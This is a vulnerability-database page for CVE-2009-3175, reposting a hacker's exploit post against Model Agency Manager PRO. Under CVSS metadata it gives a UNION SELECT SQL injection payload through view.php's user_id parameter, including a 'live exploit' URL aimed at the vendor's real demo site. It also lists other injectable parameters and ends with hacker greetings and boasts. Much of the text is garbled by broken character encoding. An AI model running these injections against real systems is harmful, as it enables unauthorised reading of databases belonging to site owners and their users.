Model Agency Manager Pro (user_id) SQL Injection Vulnerability

2009.09.15

Credit: R3d D3v!L

Risk: High

Local: No

Remote: Yes

CVE: CVE-2009-3175

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

[&#65533;&#162;] &#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;{&#216;&#216;&#179;&#217;&#65533; &#216;&#217;&#65533;&#217;&#65533;&#217;&#65533; &#216;&#217;&#65533;&#216;&#177;&#216;&#217;&#65533;&#217;&#65533; &#216;&#217;&#65533;&#216;&#177;&#216;&#217;&#65533;&#217;&#65533;}&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;&#65533;&#162;
[&#65533;]
[~] Tybe:(view.php user_id) Remote SQL Injection Vulnerability
[&#65533;]
[~] Vendor: www.phpmodelagencyscript.com
[&#65533;]
[&#65533;] Software: Model Agency Manager PRO
[&#65533;]
[&#65533;] author: ((&#209;&#65533;3d D3v!L))
[&#65533;]
[&#65533;] Date: 7.9.2009
[&#65533;]
[&#65533;] Home: CL0S3D
[&#65533;]
[&#65533;] contact: X@hotmail.co.jp
[&#65533;]&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;{DEV!L'5 of SYST3M}&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;&#65533;

[&#65533;] Exploit:

[&#65533;] XxX/view.php?user_id= EV!L !NJECT
[&#65533;] (EV!L !NJ3c7):1%20union%20select%20user(),2,3,4/*&view=photos

[&#65533;] L!VE Exploit:
http://model-agency-manager-pro.phpmodelagencyscript.com/view.php?user_id=1%20union%20select%20user(),2,3,4/*&view=photos
[&#65533;]MORE ER0RR:
photos.php?user_id=((&#209;&#65533;3d D3v!L))

motm.php?user_id=((DEV!L-Ro007))
forum_message.php?id=((STr0KE))

[&#65533;]

N073:
REAL R3d-d3V!L !S h3R3 LAM3RZ ((&#65533;X&#65533;))

ARAB!AAN HAAACCKER !!

[~]-----------------------------{str0ke}-----------------------------------------------------
[~] Greetz tO: {str0ke} & DEV!L R007 & 8orn 2 K!LL & D.MODY & G0G0 & arabian hacker & EL z0hery
[~]
[~] spechial thanks : ((dolly)) & ((7am3m)) & ghost L0v3R & &#219;&#169;&#219;&#65533;&#219;&#169;&#224;&#185;&#65533; &#216;&#185;&#217;&#65533;&#216;&#216;&#175; &#224;&#185;&#65533;&#219;&#169;&#219;&#65533;&#219;&#169; & {0rashey}
[~]
[&#65533;] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~]!'M 4r48!4N 3xPLO!T3R
[~]
[~]--------------------------------------------------------------------------------

References:

http://www.milw0rm.com/exploits/9603

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Model Agency Manager Pro (user_id) SQL Injection Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.